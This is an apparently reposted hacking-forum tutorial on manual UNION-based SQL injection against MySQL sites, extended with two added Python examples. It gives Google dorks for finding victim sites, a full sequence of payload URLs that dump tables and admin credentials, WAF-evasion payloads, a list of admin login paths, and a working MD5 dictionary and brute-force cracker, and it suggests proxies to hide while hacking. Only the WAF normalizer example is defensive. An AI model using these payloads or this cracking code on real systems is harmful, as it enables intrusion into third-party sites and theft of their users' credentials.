Full Detailed Basic SQL Injection - Zer0PwN

                                              _,.----..
                 _________________________ ,-:::::::::::+ ________
                |                        .::;;%%%%%%;:::::.       |
                |                      ,:::%%%-'" "`-%;--::\      |
                |                     /:::;%%;      .-":::::.     |
                |                     (::::%%i   _._i:::::::i     |
                |                     i::::;%i  ',, i:::::::[     |
                |                    ,:::::%%/ ,-o; ]::::::%|     |
                |                   +:::;%;-'   ""  /%:::::%|     |
                |                 ,:::;%i+==,     ,+:::::::%%.    |
                |               ,:::;%%%%\"",-.-:::::::::::%%%.   |
                |              i::::%%%%%/:;:''"`:::::::::::%%%\  |
                |              Y::::%%%%;'"      ):::::::::::%%%  |
                |              :::::;-"         ,:;::::::::::%%%i_|
                |              _>n$6n.         /:/:::::::::::/"...|
                |       _,.nn$$$$88888i _,.-'" \;::::::/"` "":::::|
                |  _.n$$$$$$$$8888888='"       i::::::/.::::;::o88|
                |o8$$$8888888888P^;;+ ,'.---.  `:;;;%j ::d88888888|
             ,o8888888888888P^".-+.   ,::*::::   +%%%i :|88%%^"'.'|
           .8888888^^^''""     |%*::-.%:::::::i    f | :|88%:.. . |
         ,888P'"|               \%%%%%\%%%%%%%<   j  | :|88%: .   |
       ,d888"   |                "-%%%%%$$$%$*%\  ;  | :]88%:. . .|
      ,8^88"    |                      \%%%%%%%%. i  i::|888%: . .|
      "  `      |                       `%%%%%%%%. \ j :|888%:....|
                |                         `-%%%%%%. \| :i88%%::%%%|
                |                            "-%%%%% + :|88%%%%o88|
                |                               +%%%%| ::888888888|
                |                                 +%%] :|88888^^'_|
                |                   __,.---;;;;;--/:%. :i8+".-::::|
                |              _.-::--':*::::::::::::i :`.-::;;;-:|
                |           .-::::::*::::::::::o:::::[ ::::-%%%%%%|
                |         +::::*::::::::::::*:::::;%%[ :|%%%%%%%%%|
                |         \%%%%%%;;;;;::;;;+%%%%%%%%%| :|%%%%%%%%'|
                |          i%%%%%%%%%%%%%%%%%%%%%%%%%i :|%%%%%%':.|
                |          i%%%%%%%^'^%%%%%%%%%%%%%%%' :i^':.:.:-'|
                |           Y%%[   :::::::::""":::::   :i:--"""  .|
                |           i%%j  :,^.._   ___         :     _.;:-|
                |           |%%i  :f%%%%%%%   """""%.  : .-:"     |
                |           i%%| :j%%%%%%%%\       %%) : i        |
                |           |%%i :|%%%%%%%%%%      :%| : |        |
                |           i%%|  `%%%%%%%%%%%\    ::t : |        |
                |           |%%i  :|%%%%%%%%%%%\   :: [: |        |
                |           |%%%  :`%%%%%%%%%%%%   :: |: |        |
                |           i%%%i  :|%%%%%%%%%%%\  :: |: |        |
                |           |%%%%i :|%%%%%%%%%%%%% :: i: |        |
                |___________|%%%%%__:%%%%%%%%%%%%%%\:_j__j________|
---------------------------------------------------
>GR33TZ T0 Zer0Lulz Group
>d0nt L33ch
>Author Zer0Pwn
>Paper= Sql Injection Tutorial
>Homep4ge % Hackforums.net
---------------------------------------------------

 

Hey guys, today I'm going to give you a good, detailed, basic SQL injection tutorial. I assume most of you are beginners to SQL injection, so let's do a quick review of what an SQL injection really is.

What Is an SQL Injection?

An SQL injection is a code injection: the site takes something you typed (here, a URL parameter) and pastes it straight into the SQL query it sends to the database, so whatever you put there becomes part of the query. The injected SQL then reads information out of the database, such as emails, usernames, passwords, etc.
In this tutorial we'll be looking for the admin panel's credentials. Keep in mind, I said admin panel, not control panel. While performing an SQL injection you may not always find what you're looking for. Some sites keep the important information elsewhere, or store it hashed, so it will not be compromised so easily.

Finding a Vulnerable Site

You can find candidate sites using dorks. Use Google, it's the best way. A dork is a search string like this:

Code:
inurl:news.php?id=
inurl:event.php?id=
inurl:order.php?id=
inurl:user.php?id=
inurl:restaurant.php?id=
inurl:buy.php?id=

There are hundreds of thousands of others, and there are also some posts about dorks, so read those if you want to find a site to test with SQL injection. A dork only finds pages that pass an id parameter to a script; whether that parameter is actually injectable is what the next step tests.

Exploiting the Database

Alright, are you all ready for the fun part? First we need to test our site to see if it's vulnerable to SQL injection. I will use a made-up site name for my example:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1

The URL needs a parameter we can put values into (the id=1 here); that parameter is our injection point. The same trick works on POST fields, cookies and headers, but this tutorial sticks to GET parameters in the URL. So after the 1 (the id) put a ' so that it looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1'

Now if we get a MySQL error (something like "You have an error in your SQL syntax"), then our site is probably vulnerable: the quote broke the query. If the page just loads normally, the site may still be vulnerable but not show its errors (that is blind injection, which this tutorial doesn't cover), so if the next steps don't work either, move on to another site.

Finding the number of columns

Now we know our site is vulnerable, so we want to start getting info out of the database. But before we do that, we have to find out which columns of the page's query are displayed on the page. We don't know how many columns the query selects yet, so we need that first. To find the number of columns we use ORDER BY with a column number: ordering by a position that doesn't exist makes the query fail. So your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

If the site just loads normally, that's good: no error, so we keep raising the number until we get an error.

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--
*NO ERROR*

http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--
*ERROR*

Okay, we got an error at 5. That means the query selects only 4 columns; since there is no 5th column to order by, the query failed.

URGENT
The two hyphens (--) are critical. They are MySQL's comment marker: everything after them on the line is ignored, so whatever the script appends after our id (a closing quote, AND conditions, a LIMIT clause) is thrown away and can't break our query. In MySQL the -- must be followed by a space, and browsers strip a trailing space from a URL, so if the plain -- doesn't work try -- - or --+ (or # / %23, which is also a MySQL comment). We NEED a comment at the end of every command.

Finding the vulnerable column

We now have the number of columns. But we need to find out which of them are printed on the page, because that's where our results will show up. We use UNION SELECT for this: it appends a row of our own to the query's result, one value per column, so we need exactly as many values as there are columns. Our URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

A couple of numbers will appear on the page. That is normal, and a good sign. Those numbers are the positions in the SELECT that the page actually displays, so those are the positions we put our commands in. Let's say that 2 appeared on the page. We will be executing commands in position 2.

URGENT
You HAVE to have the - after the = (id=-1). With a negative id the original query matches no row, so the only row the page renders is the one our UNION SELECT added. With id=1 the real event would be shown instead and our numbers would be hidden or pushed off the page.

Determining the Version of the MySQL Database

Why do we need the version, you ask? Because the version tells us which features we can use. Version 5 is easier because it has the information_schema database, which lists every database, table and column for us (version 4 doesn't, so you'd have to guess table names). So I will show you how to get information out of a version 5 database.

So our vulnerable column is 2, so that's where we'll put our code. Replace the 2 with the expression @@version. Your URL should now look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

Now it should display the Version on the page. It should look something like this:

Code:
5.1.47-community-log

The exact numbers don't matter, as long as the first one is 5 or higher.

Finding the name of the Database

The name of the database is important, at least if we want to look in the tables that contain the information. There are two common ways to get it. Both work. The first command is:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

That lists every schema the database user is allowed to see, so it may show more than the one database this site uses (and information_schema itself). All we want is the current database, so the better command is:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

Now you will be shown the database name (the concat() around database() is harmless but not needed; database() alone returns the name). Congrats, look how far we are already. Now to the good stuff!

Viewing the Tables in the Database

The tables are what contain the information, so we need to list them to find the one with the data we want.

The command to list the tables is longer than the ones we've seen so far. Here's what your URL should now look like:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

Hit enter, and the tables in the database will be displayed.

Viewing the Tables' information

We will most likely be given many tables. It's up to you to decide which one contains the valuable information.

It can be difficult to choose a table that would contain important information. We won't always need the username, since it's most likely "admin", but the password is what we REALLY need. So choose a table. The one I'll use for this example is "admin_credentials". It's very rare that you'll get a table name that obvious. Now list its columns with this query:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"--

That query will almost ALWAYS give you an error: the quotes around the table name get escaped or filtered by the application (PHP's magic_quotes or addslashes turn ' and " into \' and \"), so the string literal breaks. The fix is to write the table name as a hex literal instead, which needs no quotes at all.

To convert it, any online hex converter works, or MySQL's own HEX() function; "admin_credentials" becomes 61646d696e5f63726564656e7469616c73.

Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73--

URGENT
You MUST have the 0x in front of the hex. The 0x makes MySQL read it as a hexadecimal literal, which compares equal to the string 'admin_credentials' without needing quotes. Without it MySQL doesn't know the digits are hex and the query fails.

Displaying the Contents

The table you've chosen has columns, and the column names are what the last query gave you. Now we read the data out of those columns, which usually means goodbye tables and HELLO admin panel access.

Let's say mine shows "userpword" and "user". Those are the only columns it has (this will rarely be the case). We need to read the data in them. We can read both at once (put both column names in the group_concat with 0x3a between them as a separator, the same way the WAF section below joins version, user and database), but if you prefer one at a time, use this query:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

That will display the information, one value per row separated by commas. Where it says DBName, put the name of the database you got earlier in this tutorial, and where it says admin_credentials, put the table you're working in.

Now we should have all the credentials, so we just need to find the Admin Login.

Finding the AdminLogin

Usually all you'll have to do is take a quick look by adding /admin or a similar path to the site's root.

Like this:

Code:
http://www.hopefullyvulnerablesite.com/admin
http://www.hopefullyvulnerablesite.com/admin.php
http://www.hopefullyvulnerablesite.com/login.php
http://www.hopefullyvulnerablesite.com/admin/index.php
http://www.hopefullyvulnerablesite.com/login/index.php
http://www.hopefullyvulnerablesite.com/adminlogin
http://www.hopefullyvulnerablesite.com/adminlogin.php
http://www.hopefullyvulnerablesite.com/adminlogin/index.php
http://www.hopefullyvulnerablesite.com/moderator.php
http://www.hopefullyvulnerablesite.com/moderator
http://www.hopefullyvulnerablesite.com/modlogin

And there are plenty more. At times you won't find the login, so you'll need an admin login finder: there are some online and some downloads. I recommend doing it manually, because it's more satisfying after getting into the site.

WAF By-Passing

You may be asking, what is WAF bypassing? First off, I'll explain what a WAF is.

WAF stands for Web Application Firewall. A web application firewall is put in front of a website so it's protected from attacks such as SQL injection, XSS and other exploitation methods. The WAF inspects the requests going to the application, matches them against patterns for known attacks, and blocks the ones it recognizes.

A WAF Error will look like this:

Code:
FORBIDDEN

You are not allowed to access "" on this server
*INFORMATION ABOUT THE WEBSERVER IS HERE*

If we get that error when we use UNION SELECT, there is a WAF in front of the web server. So, in order to bypass it, we'll have to change the syntax of our command so the filter's patterns don't match while the database still understands it.

There are several methods to bypass a WAF. I'll explain a few:

1.
You usually don't have to worry about getting the number of columns, since the firewalls don't block ORDER BY, but they DO block "union select". So here's method 1 on how to bypass the firewall.

The trick is MySQL's /*! ... */ comment: MySQL executes whatever is inside it (it's a "versioned comment", meant for MySQL-only syntax), but a filter that treats it as an ordinary comment never sees the keywords. We wrap each keyword separately, so the string "union select" never appears in the request. This example assumes a target whose query has three columns. It looks like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

That bypasses the firewall. However, we still have several steps, because we still need the information from the tables and columns.

Once that is done, we get the information through the displayed column. Mixing the case of function names (CoNcAt) is another cheap way to beat a case-sensitive filter. Here's what it should look like:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--

To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--

Now it should display the information we asked for IN ORDER, separated by colons (0x3a is the hex for ":"): the version, then the database user, then the database name.

Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--

Now that will display all the tables. To get the chosen table's columns, we use this command to bypass the firewall:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--

There we go, now we're looking at the columns of the table. Now we want to dump the data, so here's what we'll use:

Code:
http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*--

And that's all for WAF bypassing. Hopefully by now you're an SQL injection expert :). If you need any more help, feel free to PM me or add a comment. I really hope this helped, good luck!
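Here is an added example (my own code, not part of the original post) showing the other side of the /*!UNION*/ trick: why a signature that looks for "union select" in the raw parameter misses it, and what a filter has to do before matching so that it sees the query the way MySQL will. The four payloads are constructed probes modelled on the tutorial's commands, not captured traffic, and the two filters are toy implementations, not any product's real rules.

```python
import re
from urllib.parse import unquote_plus

# Constructed probes: the tutorial's plain UNION SELECT and the /*!...*/ form
# it uses to slip past the filter, plus a mixed-case and a URL-encoded variant.
PLAIN_PAYLOAD = "-1 union select 1,2,3--"
BYPASS_PAYLOAD = "-1 /*!UNION*/ /*!SELECT*/ 1,2,3--"
BYPASS_MIXED = "-1 /*!UnIoN*/ /*!sElEcT*/ 1,CoNcAt(version()),3--"
BYPASS_URLENC = "-1%20/*!UNION*/%20/*!SELECT*/%201,2,3--"

# The kind of signature a naive filter ships with: the two keywords
# separated only by whitespace.
UNION_SELECT = re.compile(r"\bunion\s+select\b", re.IGNORECASE)

def naive_waf_blocks(raw_param):
    """Pattern-matches the parameter exactly as it arrived."""
    return bool(UNION_SELECT.search(raw_param))

def normalize(raw_param):
    """Rewrite the parameter into the form MySQL will actually parse:
    1. URL-decode, because the web server will.
    2. Unwrap /*! ... */ versioned comments: MySQL executes their contents
       (an optional version number may follow the '!'), so to the database
       /*!UNION*/ is just UNION.
    3. Drop ordinary /* ... */ comments, which the database ignores.
    4. Collapse whitespace runs and lower-case, so CoNcAt and spacing
       games don't matter either."""
    s = unquote_plus(raw_param)
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()

def normalized_waf_blocks(raw_param):
    """The same signature, applied after normalization."""
    return bool(UNION_SELECT.search(normalize(raw_param)))

if __name__ == "__main__":
    for name, payload in [("plain", PLAIN_PAYLOAD), ("versioned comment", BYPASS_PAYLOAD),
                          ("mixed case", BYPASS_MIXED), ("url-encoded", BYPASS_URLENC)]:
        print(f"{name:18} naive={naive_waf_blocks(payload)!s:5} "
              f"normalized={normalized_waf_blocks(payload)!s:5} -> {normalize(payload)}")
```

The naive filter only stops the plain payload; every bypass variant normalizes back to the same "-1 union select ..." string and is caught by the second filter. This is also why WAF bypasses are a moving target: each one exploits a gap between what the filter parses and what the database parses.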

Cracking Hashes

What is a hash, you may be asking? A hash is a one-way fingerprint of a password (or of any other "hidden" information that can be used against the person or site). It is not encryption: there is no key, and nothing turns the hash back into the password. Sites store hashes instead of passwords so that if there is a security breach it's hard to get the true password of the user or of the admin panel.

There are many types of hashes, but the one you'll run into most is MD5 (32 hex characters). Cracking an MD5 means guessing: you hash other candidate passwords and compare the results to the hash. There is no way to reverse it directly.

The best site you'll find for looking up a hash would definitely be
http://www.md5decrypter.co.uk/
Sites like that look the hash up in a huge table of passwords they've already hashed, so they only help if the password was in someone's list and was hashed without a salt.

But if you've got some time on your hands and want a better chance, I recommend Cain & Abel. You can perform a dictionary attack on the MD5 hash.
You'll need a wordlist.
A dictionary attack won't ALWAYS work, but most of the time it will. It all depends on the webmaster. Some people use random strings of numerals and letters, in which case you'd have to brute force, which is much more of a hassle. And if the site added a salt before hashing, the lookup sites will fail and your cracker needs to know the salt too.

There are plenty of Wordlists that you can find on HF. If you can't find any, PM me and I'll give you a link.
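As an added example (my own code, not from the original post), here is the "hash the candidates and compare" loop the section describes, written out in Python with hashlib: a length-based guess at the hash type, a dictionary attack that can also handle a salt, and the brute-force fallback for random-looking passwords. The wordlist and the target hashes are constructed for the demo; the first target is the MD5 of "password".

```python
import hashlib
import itertools

# Constructed wordlist standing in for the one the tutorial tells you to download.
WORDLIST = ["123456", "letmein", "qwerty", "password", "admin2011"]

def guess_hash_type(hex_digest):
    """The digest length narrows the algorithm; 32 hex chars is the MD5
    length the tutorial talks about (NTLM hashes are the same length)."""
    return {32: "MD5 (or NTLM)", 40: "SHA-1", 64: "SHA-256"}.get(len(hex_digest), "unknown")

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def dictionary_attack(target_hex, words, salt="", salt_first=True):
    """Hash every candidate and compare. For an unsalted MD5 this is the only
    way back to the password. If the application salted the hash, the lookup
    sites fail and you need the salt and its position (prefix or suffix)."""
    target_hex = target_hex.lower()
    for word in words:
        candidate = salt + word if salt_first else word + salt
        if md5_hex(candidate) == target_hex:
            return word
    return None

def brute_force(target_hex, charset, max_len):
    """Exhaustive search for random-looking passwords. The number of
    candidates is len(charset) ** length for each length, which is why the
    wordlist always comes first and why eight random characters is a hassle."""
    target_hex = target_hex.lower()
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            candidate = "".join(chars)
            if md5_hex(candidate) == target_hex:
                return candidate
    return None

if __name__ == "__main__":
    target = "5f4dcc3b5aa765d61d8327deb882cf99"   # constructed: md5("password")
    print("type:", guess_hash_type(target))
    print("dictionary:", dictionary_attack(target, WORDLIST))
    salted = md5_hex("s4lt" + "password")          # constructed salted variant
    print("salted, no salt given:", dictionary_attack(salted, WORDLIST))
    print("salted, salt given:", dictionary_attack(salted, WORDLIST, salt="s4lt"))
    print("brute force:", brute_force(md5_hex("z9"), "abcxyz0123456789", 2))
```

The salted run shows the failure mode the section warns about: the same wordlist finds nothing until the salt is supplied, so a cracked-hash service that knows nothing about the site's salt cannot help.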

Epilogue

This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.

SQL injection against a site you don't have permission to test IS ILLEGAL. Whatever you do with it is your responsibility, not mine. You can get in lots of trouble for an SQL injection. Check out the Proxies and Socks section for protection while hacking a site.

Good luck! And have fun!

Reposted on the Alibaba Cloud developer community by cnbird (Alibaba Cloud security expert, responsible for Alibaba Cloud product security).